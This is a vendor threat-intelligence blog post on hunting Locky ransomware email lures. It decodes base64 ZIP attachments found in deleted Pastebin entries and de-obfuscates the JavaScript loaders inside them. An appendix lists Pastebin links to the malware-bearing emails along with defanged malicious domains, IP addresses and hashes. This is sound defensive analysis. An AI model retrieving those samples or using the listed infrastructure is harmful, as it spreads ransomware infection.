Hunting Ransomware Email Lures With Recorded Future

January 10, 2017 • Glenn Wong

Learn how to find and analyze base64-encoded Locky attachments in Pastebin.

Summary

In this blog post we describe a hunting methodology to find and analyze base64-encoded malware (Locky installer) sent as an attachment in phishing emails found on Pastebin. This methodology leverages Recorded Future’s API and integrations with OMNI Intelligence Partners, and can be easily customized to suit your organization’s priorities and established hunting approaches.

The methodology is as follows:

  1. Identify recently deleted Pastebin entries (emails) that have base64-encoded attachments.
  2. Decode attachment text (e.g., using a tool such as CyberChef).
  3. Unzip the resulting ZIP file.
  4. Utilize a few simple techniques to make IOCs (indicators of compromise) readable as clear text in the obfuscated JavaScript code found in the unzipped .wsf or .js file.
  5. Look up IOCs in Recorded Future to gain quick insight on nature of malware threat.

This technique can also be used to examine suspicious inbound email attachments, and serves as a useful general approach for both mature security teams with dedicated threat intelligence personnel and smaller teams looking for ways to boost their capabilities.

Methodology Details

To identify suspicious emails with base64-encoded attachments, we set up a process using Recorded Future’s API to identify deleted pastes that contain “base64 encoding” references (Recorded Future customers can get more details on the approach via this community support page). The API query targeted a specific set of pastes based on timing and keyword criteria, and a subsequent HEAD request to Pastebin checked whether or not the paste was still available or not.

Pastebin Reference

Example reference to deleted Pastebin entries containing base64-encoded information.

In the last few weeks, this process has yielded information on seven different email pastes:

Although the pastes have been deleted on Pastebin, Recorded Future users can obtain cached versions of the entries, including the base64-encoded attachment.

Cached Pastebin Entry

Cached entry from Pastebin, including the base64-encoded attachment.

Copying and pasting this text to a tool such as CyberChef reveals that this is indeed a ZIP file (note the “PK” prefix in the decoded text, which is the magic number or file signature for a ZIP file; “PK” are also the initials of Phil Katz, the co-creator of the ZIP file format).

Decoded Attachment in CyberChef

Decoded attachment (in CyberChef) showing “PK” prefix indicating this is a ZIP file.

This file can be unzipped within CyberChef, revealing a Windows scripting file (.wsf) or JavaScript file (.js) in the most recent examples.

Unzipped .wsf File

Unzipped .wsf file from the attachment found on Pastebin.

Unzipped .js File

Unzipped .js file from the attachment found on Pastebin.

The unzipped file shows obfuscated JavaScript; fortunately these examples used relatively simple obfuscation approaches. Details on how they were made readable are included in the appendix.

Obfuscated JavaScript in the Unzipped File

Obfuscated JavaScript in the unzipped file “~_XASO0T_~.js”.

De-Obfuscated JavaScript Code

Example of de-obfuscated JavaScript code, showing ActiveXObjects and specific domains included in the malware.

Looking up the IOCs in Recorded Future can provide very quick context to the nature of this malware; although there are very few references to this domain, the dynamoo blog does note that the domain happyfeet.de (and others found in this .js file) are associated with Locky.

Overview of Domain Intel Card

Recent References on Domain Intel Card

Domain Intel Card for happyfeet.de, one of the IOCs found in the “~_XASO0T_~.js” file.

Additional context with even clearer verdicts are easily obtained in two clicks by utilizing our OMNI Intelligence Partners, DomainTools and PhishMe. Through these extensions, we quickly discover that the domain is blacklisted and carries DomainTools’s highest risk score, while PhishMe has positively identified the domain as part of an email campaign that installs Locky on the computers of unsuspecting victims that have opened the attached zip file.

DomainTool Lookup

DomainTools lookup in the Domain Intel Card for happyfeet.de.

PhishMe Lookup

PhishMe lookup in the Domain Intel Card for happyfeet.de.

Conclusion

We have demonstrated a straightforward approach to find and analyze base64-encoded attachments in suspicious emails. By utilizing Recorded Future and its OMNI Intelligence Partners, the nature of the attack and related risks can be quickly discerned, giving security teams more advanced threat warnings (if hunting with external information, such as the Pastebin entries described herein) and faster time to remediation (if reviewing inbound email traffic).


Appendix 1

CyberChef Recipe used to de-obfuscate the JavaScript in the above example:

CyberChef Recipe

Appendix 2

IOCs of seven suspicious emails identified through recent deleted Pastebin entries with base64-encoded attachments.

Notes

  • The MD5 hashes represent both the ZIP archive and the unzipped .wsf or .js files.
  • ActiveXObjects and domains were found directly within the obfuscated JavaScript.
  • IP Addresses associated with domains were obtained via Farsight pDNS data.

December 14: http://pastebin.com/eJvDV5LK

MD5 Hashes

  • 5ddd66be23827d9eeb0434bb66016e82
  • 51604dc1d64a94ccbcc2d680f7376967

ActiveXObjects

  • ADODB.Stream
  • MSXML2.XMLHTTP
  • WScript.Shell
  • Scripting.FileSystemObject

Domains

  • thewebgroup[.]net
  • continentalprintingsupplies[.]com
  • netkeycompany[.]com
  • tobybender[.]com
  • buttonart[.]xyz

IP Addresses

  • 199[.]59[.]58[.]6
  • 66[.]175[.]58[.]9
  • 54[.]187[.]5[.]20
  • 64[.]34[.]157[.]60

AS Numbers

  • AS13354
  • AS30447
  • AS16509
  • AS13768

December 15: http://pastebin.com/qCGsBAiz

MD5 Hashes

  • 35f91ab294e0c646bca54feee0a5a2e1
  • 808214981e1fc374b9170e83b1ad2081

ActiveXObjects

  • ADODB.Stream
  • MSXML2.XMLHTTP
  • WScript.Shell
  • Scripting.FileSystemObject

Domains

  • hedefosgb[.]com
  • zhiyuw[.]com
  • bappeda[.]dharmasrayakab[.]go[.]id
  • viscarci[.]com
  • chinaxw[.]org

IP Addresses

  • 185[.]85[.]205[.]18
  • 120[.]210[.]204[.]33
  • 222[.]124[.]129[.]173
  • 120[.]39[.]243[.]225
  • 210[.]209[.]73[.]120

AS Numbers

  • AS201079
  • AS9808
  • AS17974
  • AS4134
  • AS17444

December 16: http://pastebin.com/LmCcGJMR

MD5 Hashes

  • 6d2fac2bd57abdf570ebcab772aab7ef
  • 30b22530fbd9d7df9409213d4f433fc2

ActiveXObjects

  • ADODB.Stream
  • MSXML2.XMLHTTP
  • WScript.Shell
  • Scripting.FileSystemObject

Domains

  • honestflooring[.]com
  • happyfeet[.]de
  • elevationmusic[.]de

IP Addresses

  • 43[.]241[.]73[.]185
  • 217[.]160[.]231[.]125
  • 46[.]252[.]16[.]148

AS Numbers

  • AS132056
  • AS8560
  • AS34011

December 22: http://pastebin.com/ge6WhPvJ

MD5 Hashes

  • 479ca1df2081ef67bbe159c1eaeb92bf
  • a0c5075996c9dd1eeddb5ef308ca9f0b

ActiveXObject

  • Msxml2.XMLHTTP

Domains

  • minebleue[.]com
  • offie[.]nl
  • www[.]pegamontsa[.]ro
  • chaitanyaimpex[.]org
  • break-first[.]com

IP Addresses

  • 213[.]186[.]33[.]87
  • 109[.]72[.]85[.]5
  • 194[.]102[.]200[.]35
  • 43[.]255[.]154[.]44
  • 87[.]98[.]144[.]123

AS Numbers

  • AS16276
  • AS48635
  • AS15882
  • AS26496
  • AS16276

December 22: http://pastebin.com/GW0DXfCR

MD5 Hashes

  • 6eab51108fdce736ead29e1746554b2a
  • 6482a984ca53e15e7216518f896720a4

ActiveXObject

  • Msxml2.XMLHTTP

Domains

  • megrelis-avocat[.]com
  • offie[.]nl
  • med-lex[.]com
  • mercadoatlantico[.]com[.]br
  • instalaciondeairesplit[.]com

IP Addresses

  • 213[.]186[.]33[.]82
  • 109[.]72[.]85[.]5
  • 213[.]186[.]33[.]17
  • 186[.]202[.]183[.]63
  • 181[.]88[.]192[.]158

AS Numbers

  • AS16276
  • AS48635
  • AS27715
  • AS7303

December 23: http://pastebin.com/VYFNEtGP

MD5 Hashes

  • 721f7206f7efe6de34c4aaba2c41a96
  • dd48ed2a616e750076d62cacf6ab6a24

ActiveXObject

  • Msxml2.XMLHTTP

Domains

  • sonja[.]ostrovanka[.]cz
  • break-first[.]com
  • mercadoatlantico[.]com[.]br
  • megrelis-avocat[.]com
  • minebleue[.]com

IP Addresses

  • 88[.]86[.]121[.]24
  • 87[.]98[.]144[.]123
  • 186[.]202[.]183[.]63
  • 213[.]186[.]33[.]82
  • 213[.]186[.]33[.]87

AS Numbers

  • AS39392
  • AS16276
  • AS27715
  • AS16276

December 23: http://pastebin.com/cjj96hsq

MD5 Hashes

  • 52725fa89cafae845431a6099ac8ca60
  • 7ea18a094dc2565ca1a4da697777aa1a

ActiveXObject

  • Msxml2.XMLHTTP

Domains

  • chaitanyaimpex[.]org
  • break-first[.]com
  • sonja[.]ostrovanka[.]cz
  • mercadoatlantico[.]com[.]br
  • med-lex[.]com

IP Addresses

  • 43[.]255[.]154[.]44
  • 87[.]98[.]144[.]123
  • 88[.]86[.]121[.]24
  • 186[.]202[.]183[.]63
  • 213[.]186[.]33[.]17

AS Numbers

  • AS26496
  • AS16276
  • AS39392
  • AS27715
  • AS16276
New call-to-action

Related Posts

How Elite Intelligence Makes MISP More Powerful

How Elite Intelligence Makes MISP More Powerful

July 28, 2020 • The Recorded Future Team

Security analysts are under more pressure than ever As businesses adapt to new realities, the...

How Security Intelligence Improves State and Local Governments’ Strategies

How Security Intelligence Improves State and Local Governments’ Strategies

July 23, 2020 • The Recorded Future Team

State and local security analysts and their teams are drowning in threat data Agency silos make it...

Continued Rise in Ransomware Attacks Against Healthcare Providers

Continued Rise in Ransomware Attacks Against Healthcare Providers

July 16, 2020 • Allan Liska

It seems almost trite to write a report about ransomware attacks against healthcare providers After...